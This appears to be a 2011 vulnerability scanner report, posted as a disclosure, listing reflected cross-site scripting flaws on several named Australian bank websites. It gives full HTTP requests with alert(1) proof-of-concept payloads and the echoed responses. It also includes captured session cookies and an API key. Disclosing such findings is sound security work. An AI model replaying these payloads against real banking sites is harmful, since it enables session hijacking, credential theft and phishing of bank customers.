XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09272011-02

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://apps.nowwhere.com.au/analytics/loghandler.ashx [scb parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://apps.nowwhere.com.au
Path:	/analytics/loghandler.ashx

Issue detail

The value of the scb request parameter is copied into the HTML document as plain text between tags. The payload b2c26<script>alert(1)</script>dd16c81c95f was submitted in the scb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /analytics/loghandler.ashx?key=y2X8qJS45oc3MEas513Kg2y3s8XqWR8Oq2112o8m&obj=2&fcb=MapDS.Analytics.CallBacks%5B39002%5D&scb=MapDS.Analytics.CallBacks%5B22845%5Db2c26<script>alert(1)</script>dd16c81c95f&nocache=1317135250522 HTTP/1.1
Host: apps.nowwhere.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.locate.anz.com/anz/international?r=http://www.anz.com/auxiliary/search/Default.asp?qu=xss&btnSiteSearch=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 27 Sep 2011 14:53:54 GMT
Content-Type: text/javascript; charset=utf-8
Expires: Mon, 01 Jan 0001 00:00:00 GMT
Server: Microsoft-IIS/6.0
From: Web01
p3p: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR NOR IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 76

MapDS.Analytics.CallBacks[22845]b2c26<script>alert(1)</script>dd16c81c95f();

1.2. http://australianewzealandb.tt.omtrdc.net/m2/australianewzealandb/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://australianewzealandb.tt.omtrdc.net
Path:	/m2/australianewzealandb/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 4e9bd<script>alert(1)</script>99124c7b70e was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/australianewzealandb/mbox/standard?mboxHost=www.anz.com&mboxSession=1317133227582-60217&mboxPage=1317133227582-60217&screenHeight=1200&screenWidth=1920&browserWidth=1087&browserHeight=927&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=AUPersonalLeftSituational4e9bd<script>alert(1)</script>99124c7b70e&mboxId=0&mboxTime=1317115228750&mboxURL=http%3A%2F%2Fwww.anz.com%2Fpersonal%2F&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Faq%3Df%26gcx%3Dc%26sourceid%3Dchrome%26ie%3DUTF-8%26q%3Daustralia%2Bbank&mboxVersion=40 HTTP/1.1
Host: australianewzealandb.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.anz.com/personal/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 220
Date: Tue, 27 Sep 2011 14:20:59 GMT
Server: Test & Target

mboxFactories.get('default').get('AUPersonalLeftSituational4e9bd<script>alert(1)</script>99124c7b70e',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317133227582-60217.19");

1.3. http://calculator-config.infochoice.com.au/RenderCalculator.ashx [popup parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://calculator-config.infochoice.com.au
Path:	/RenderCalculator.ashx

Issue detail

The value of the popup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2984"%3balert(1)//1423296e9b6 was submitted in the popup parameter. This input was echoed as c2984";alert(1)//1423296e9b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RenderCalculator.ashx?client=4fc422d4-0c52-427e-981e-0798a156a823&calculator=b9d47181-d8f1-46b4-bed8-e0cec1946c77&popup=falsec2984"%3balert(1)//1423296e9b6&type=js HTTP/1.1
Host: calculator-config.infochoice.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://oma.hsbc.com.au/homeloanwork/calculators.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 15:02:59 GMT
Content-Length: 6006

(function() {

var initd = false;
var rand = Math.round(Math.random()*100000);
var popup = "falsec2984";alert(1)//1423296e9b6"; //if popup names an element, make that element

var calcName = "Home Loan Repayments";
var calcStyles = "<style type=\"text/css\" media=\"screen\">
...[SNIP]...

1.4. http://data.nowwhere.com.au/v2/features.svc/ANZCOUNTRIES.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://data.nowwhere.com.au
Path:	/v2/features.svc/ANZCOUNTRIES.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload deca8<script>alert(1)</script>4a96d02dce was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/features.svc/ANZCOUNTRIES.json?callback=MapDS.CallBacks%5B1317135254613%5Ddeca8<script>alert(1)</script>4a96d02dce&key=y2X8qJS45oc3MEas513Kg2y3s8XqWR8Oq2112o8m&sortorder=asc&sortby=storename&filter=NOT%20Country%20%3D%20%22%22&enc=true&nocache=1317135249045 HTTP/1.1
Host: data.nowwhere.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.locate.anz.com/anz/international?r=http://www.anz.com/auxiliary/search/Default.asp?qu=xss&btnSiteSearch=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 27 Sep 2011 14:53:57 GMT
Content-Type: text/javascript
Server: Microsoft-IIS/6.0
p3p: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR NOR IND UNI COM NAV INT"
From: App03
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Disposition: inline
Vary: Accept-Encoding
Content-Length: 20536

MapDS.CallBacks[1317135254613]deca8<script>alert(1)</script>4a96d02dce({"type":"FeatureCollection","features":[{"type":"Feature","geometry":{"type":"Point","coordinates":[-170.122788,-14.272988]},"properties":{"box":"8","country":"AS","ref_x":"-170.1227880","ref_y":"-14.
...[SNIP]...

1.5. http://data.nowwhere.com.au/v2/features.svc/ANZCOUNTRIES.json [sortorder parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://data.nowwhere.com.au
Path:	/v2/features.svc/ANZCOUNTRIES.json

Issue detail

The value of the sortorder request parameter is copied into the HTML document as plain text between tags. The payload 15d7f<img%20src%3da%20onerror%3dalert(1)>aaaeae78294 was submitted in the sortorder parameter. This input was echoed as 15d7f<img src=a onerror=alert(1)>aaaeae78294 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /v2/features.svc/ANZCOUNTRIES.json?callback=MapDS.CallBacks%5B1317135254613%5D&key=y2X8qJS45oc3MEas513Kg2y3s8XqWR8Oq2112o8m&sortorder=asc15d7f<img%20src%3da%20onerror%3dalert(1)>aaaeae78294&sortby=storename&filter=NOT%20Country%20%3D%20%22%22&enc=true&nocache=1317135249045 HTTP/1.1
Host: data.nowwhere.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.locate.anz.com/anz/international?r=http://www.anz.com/auxiliary/search/Default.asp?qu=xss&btnSiteSearch=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 27 Sep 2011 14:54:18 GMT
Content-Type: text/javascript
Server: Microsoft-IIS/6.0
p3p: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR NOR IND UNI COM NAV INT"
From: App02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Disposition: inline
Vary: Accept-Encoding
Content-Length: 694

MapDS.CallBacks[1317135254613]({"code":500,"message":"Incorrect query option. Requested value 'ASC15D7F<IMG SRC=A ONERROR=ALERT(1)>AAAEAE78294' was not found..\r\n at MapDS.Features.SortOrder..ctor(String value)\r\n at MapDS.Features.CriteriaFactory.CreateCriteria(IQuery query, String name, String value)\r\n at MapDS.Features.SelectQue
...[SNIP]...

1.6. https://login.commbiz.commbank.com.au/ [__PrevAppReqBody parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://login.commbiz.commbank.com.au
Path:	/

Issue detail

The value of the __PrevAppReqBody request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fce1"><script>alert(1)</script>0fd5efa4055 was submitted in the __PrevAppReqBody parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /?CBAAUTH=LOGIN HTTP/1.1
Host: login.commbiz.commbank.com.au
Connection: keep-alive
Content-Length: 1594
Cache-Control: max-age=0
Origin: https://login.commbiz.commbank.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://login.commbiz.commbank.com.au/?cbaauth=prelogin
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cmgkw=%5B%5B%27ns%257Caustralia%2520bank%27%2C%271317133223146%27%5D%5D; c_m=australia%20bankGooglewww.google.com; __utma=176409783.1366260428.1317133221.1317133221.1317133221.1; __utmb=176409783.3.10.1317133221; __utmc=176409783; __utmz=176409783.1317133221.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=australia%20bank; s_cc=true; gpv_p6=no%20value; s_nr=1317134150368; s_sq=%5B%5BB%5D%5D; _CBAPVCOOKIE=SID=zv3zhI5mPmI=&RID=fn51r15Ng0aUGqOOEPLVoQ; CBACBS=1; BIGipServerpool_cbz_loginproxy_28142=572530348.61037.0000; BIGipServerpool_cbz_static_80=2219354304.20480.0000

__cbaUsername=xss&__cbaPassword=xss&__cbaOnetimePassword=xss&__PrevAppReqHeaders=Connection%253a%2Bkeep-alive%250d%250aAccept%253a%2Btext%252fhtml%252capplication%252fxhtml%252bxml%252capplication%252
...[SNIP]...
L%252c%2Blike%2BGecko%29%2BChrome%252f14.0.835.186%2BSafari%252f535.1%250d%250aCBAClientIP%253a%2B50.23.123.106%250d%250aCBARequestURL%253a%2B%252f%253fcbaauth%253dprelogin%250d%250a&__PrevAppReqBody=3fce1"><script>alert(1)</script>0fd5efa4055&__PrevAppReqMethod=GET&__PageGeneratedTimestamp=27%252f09%252f2011%2B14%253a35%253a40

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 14:54:26 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7849
Set-Cookie: CBACBS=1; domain=commbank.com.au; path=/
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<title>Log on to CommBiz</title>
<meta
...[SNIP]...
<input type="hidden" name="__PrevAppReqBody" ID="__PrevAppReqBody" value="3fce1"><script>alert(1)</script>0fd5efa4055" >
...[SNIP]...

1.7. https://login.commbiz.commbank.com.au/ [__PrevAppReqHeaders parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://login.commbiz.commbank.com.au
Path:	/

Issue detail

The value of the __PrevAppReqHeaders request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6fea"><script>alert(1)</script>d40dd4a5e79 was submitted in the __PrevAppReqHeaders parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /?CBAAUTH=LOGIN HTTP/1.1
Host: login.commbiz.commbank.com.au
Connection: keep-alive
Content-Length: 1594
Cache-Control: max-age=0
Origin: https://login.commbiz.commbank.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://login.commbiz.commbank.com.au/?cbaauth=prelogin
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cmgkw=%5B%5B%27ns%257Caustralia%2520bank%27%2C%271317133223146%27%5D%5D; c_m=australia%20bankGooglewww.google.com; __utma=176409783.1366260428.1317133221.1317133221.1317133221.1; __utmb=176409783.3.10.1317133221; __utmc=176409783; __utmz=176409783.1317133221.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=australia%20bank; s_cc=true; gpv_p6=no%20value; s_nr=1317134150368; s_sq=%5B%5BB%5D%5D; _CBAPVCOOKIE=SID=zv3zhI5mPmI=&RID=fn51r15Ng0aUGqOOEPLVoQ; CBACBS=1; BIGipServerpool_cbz_loginproxy_28142=572530348.61037.0000; BIGipServerpool_cbz_static_80=2219354304.20480.0000

__cbaUsername=xss&__cbaPassword=xss&__cbaOnetimePassword=xss&__PrevAppReqHeaders=Connection%253a%2Bkeep-alive%250d%250aAccept%253a%2Btext%252fhtml%252capplication%252fxhtml%252bxml%252capplication%252
...[SNIP]...
52f535.1%2B%28KHTML%252c%2Blike%2BGecko%29%2BChrome%252f14.0.835.186%2BSafari%252f535.1%250d%250aCBAClientIP%253a%2B50.23.123.106%250d%250aCBARequestURL%253a%2B%252f%253fcbaauth%253dprelogin%250d%250aa6fea"><script>alert(1)</script>d40dd4a5e79&__PrevAppReqBody=&__PrevAppReqMethod=GET&__PageGeneratedTimestamp=27%252f09%252f2011%2B14%253a35%253a40

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 14:54:21 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7849
Set-Cookie: CBACBS=1; domain=commbank.com.au; path=/
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<title>Log on to CommBiz</title>
<meta
...[SNIP]...
lla%2f5.0+(Windows+NT+6.1%3b+WOW64)+AppleWebKit%2f535.1+(KHTML%2c+like+Gecko)+Chrome%2f14.0.835.186+Safari%2f535.1%0d%0aCBAClientIP%3a+50.23.123.106%0d%0aCBARequestURL%3a+%2f%3fcbaauth%3dprelogin%0d%0aa6fea"><script>alert(1)</script>d40dd4a5e79" >
...[SNIP]...

1.8. https://login.commbiz.commbank.com.au/ [__PrevAppReqMethod parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://login.commbiz.commbank.com.au
Path:	/

Issue detail

The value of the __PrevAppReqMethod request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f49ac"><script>alert(1)</script>0ffd677aa0a was submitted in the __PrevAppReqMethod parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /?CBAAUTH=LOGIN HTTP/1.1
Host: login.commbiz.commbank.com.au
Connection: keep-alive
Content-Length: 1594
Cache-Control: max-age=0
Origin: https://login.commbiz.commbank.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://login.commbiz.commbank.com.au/?cbaauth=prelogin
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cmgkw=%5B%5B%27ns%257Caustralia%2520bank%27%2C%271317133223146%27%5D%5D; c_m=australia%20bankGooglewww.google.com; __utma=176409783.1366260428.1317133221.1317133221.1317133221.1; __utmb=176409783.3.10.1317133221; __utmc=176409783; __utmz=176409783.1317133221.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=australia%20bank; s_cc=true; gpv_p6=no%20value; s_nr=1317134150368; s_sq=%5B%5BB%5D%5D; _CBAPVCOOKIE=SID=zv3zhI5mPmI=&RID=fn51r15Ng0aUGqOOEPLVoQ; CBACBS=1; BIGipServerpool_cbz_loginproxy_28142=572530348.61037.0000; BIGipServerpool_cbz_static_80=2219354304.20480.0000

__cbaUsername=xss&__cbaPassword=xss&__cbaOnetimePassword=xss&__PrevAppReqHeaders=Connection%253a%2Bkeep-alive%250d%250aAccept%253a%2Btext%252fhtml%252capplication%252fxhtml%252bxml%252capplication%252
...[SNIP]...
9%2BChrome%252f14.0.835.186%2BSafari%252f535.1%250d%250aCBAClientIP%253a%2B50.23.123.106%250d%250aCBARequestURL%253a%2B%252f%253fcbaauth%253dprelogin%250d%250a&__PrevAppReqBody=&__PrevAppReqMethod=GETf49ac"><script>alert(1)</script>0ffd677aa0a&__PageGeneratedTimestamp=27%252f09%252f2011%2B14%253a35%253a40

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 14:54:31 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7849
Set-Cookie: CBACBS=1; domain=commbank.com.au; path=/
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<title>Log on to CommBiz</title>
<meta
...[SNIP]...
<input type="hidden" name="__PrevAppReqMethod" ID="__PrevAppReqMethod" value="GETf49ac"><script>alert(1)</script>0ffd677aa0a" >
...[SNIP]...

1.9. http://www.commbank.com.au/search/searchresults.aspx [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.commbank.com.au
Path:	/search/searchresults.aspx

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78b25"%3balert(1)//9c6179a3b70 was submitted in the q parameter. This input was echoed as 78b25";alert(1)//9c6179a3b70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search/searchresults.aspx?q=78b25"%3balert(1)//9c6179a3b70&x=11&y=7 HTTP/1.1
Host: www.commbank.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.commbank.com.au/business/international/importers/default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: commbankhttpnew=YVPWQQScommbank-n81CKWJQ; s_cmgkw=%5B%5B%27ns%257Caustralia%2520bank%27%2C%271317133223146%27%5D%5D; c_m=australia%20bankGooglewww.google.com; __utma=176409783.1366260428.1317133221.1317133221.1317133221.1; __utmb=176409783.3.10.1317133221; __utmc=176409783; __utmz=176409783.1317133221.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=australia%20bank; s_cc=true; gpv_p6=no%20value; s_nr=1317134147714; s_sq=cba-prod%3D%2526pid%253Dcba%25253Abus%25253Ainternational%25253Aimporters%25253Adefault.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//www.commbank.com.au/images/global/search-right-icon.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24291
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 14:35:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
<script language="JavaScript" type="text/javascript">s.evar1 = s.prop13 = "78b25";alert(1)//9c6179a3b70"; var s_code = s.t(); if (s_code) document.write(s_code);</script>
...[SNIP]...

1.10. https://www.macquarie.com.au/mgl/au/personal/search-results [query parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/search-results

Issue detail

The value of the query request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 244e5</script><img%20src%3da%20onerror%3dalert(1)>17967e3e96 was submitted in the query parameter. This input was echoed as 244e5</script><img src=a onerror=alert(1)>17967e3e96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Request

GET /mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage244e5</script><img%20src%3da%20onerror%3dalert(1)>17967e3e96&x=10&y=6 HTTP/1.1
Host: www.macquarie.com.au
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.macquarie.com.au/mgl/au/personal/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDD4123DD58BBE2234B2E6289A4970D4; TS56ffcb=2390808baf1d517ddb61854e0f3693b836824e21333054354e81db99a3a2c207ffffffff60ac0ec563d3f1d9; JSESSIONID=1FGpTBbZvpBm4sfrTbRWLZJscqVzfyj7rmGz9pWryMWdww72Tbvx!344053406; s_vi=[CS]v1|2740EDCF85010FFB-40000104C038252C[CE]; PD_STATEFUL_543a95c9-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; TS529c02=e0a150b02758db439940140941aa77aa36824e21333054354e81db99a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; s_cc=true; s_nr=1317133331535; s_sq=mqg-inter-ccir-comau%3D%2526pid%253Dau%2526pidt%253D1%2526oid%253Dhttp%25253A//www.macquarie.com.au/mgl/au/personal%2526ot%253DA

Response

HTTP/1.1 200 OK
content-type: text/html;charset=UTF-8
date: Tue, 27 Sep 2011 14:35:12 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 109867
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0, JSF/1.2
x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC9zZWFyY2gtcmVzdWx0cw..
Set-Cookie: PD-S-SESSION-ID=2_1mU8KcPcYuclxV-kvu+CinXJ9ffnVhmdDQHAQBw1Tek+lL3k; Path=/; Secure; HttpOnly
Set-Cookie: TS529c02=2765a8b12f3d12dbabc965e7e126f487a81f016caed108444e81df00aac4ce84002f3168; Max-Age=900; Path=/
Content-Length: 109867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Results</tit
...[SNIP]...
it=function(){A4J.AJAX.Submit('mppForm:j_id40','mppForm',null,{'oncomplete':function(request,event,data){ecl_gp_postGoogle(data.valid, data.payload, '', data.searchDuration, 'xss interest bond mortgage244e5</script><img src=a onerror=alert(1)>17967e3e96', data.estimatedResults,data.start, data.resultsPerPage);},'parameters':{'mppForm:j_id41':'mppForm:j_id41'} ,'actionUrl':'/mgl/au/personal/retail_portal/templateProxy.htm'} )};
//]]>
...[SNIP]...

1.11. http://www.bendigobank.com.au/ [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bendigobank.com.au
Path:	/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d66c2"-alert(1)-"0e6a1ae23d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.bendigobank.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1d66c2"-alert(1)-"0e6a1ae23d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?aq=f&gcx=c&sourceid=chrome&ie=UTF-8&q=australia+bank
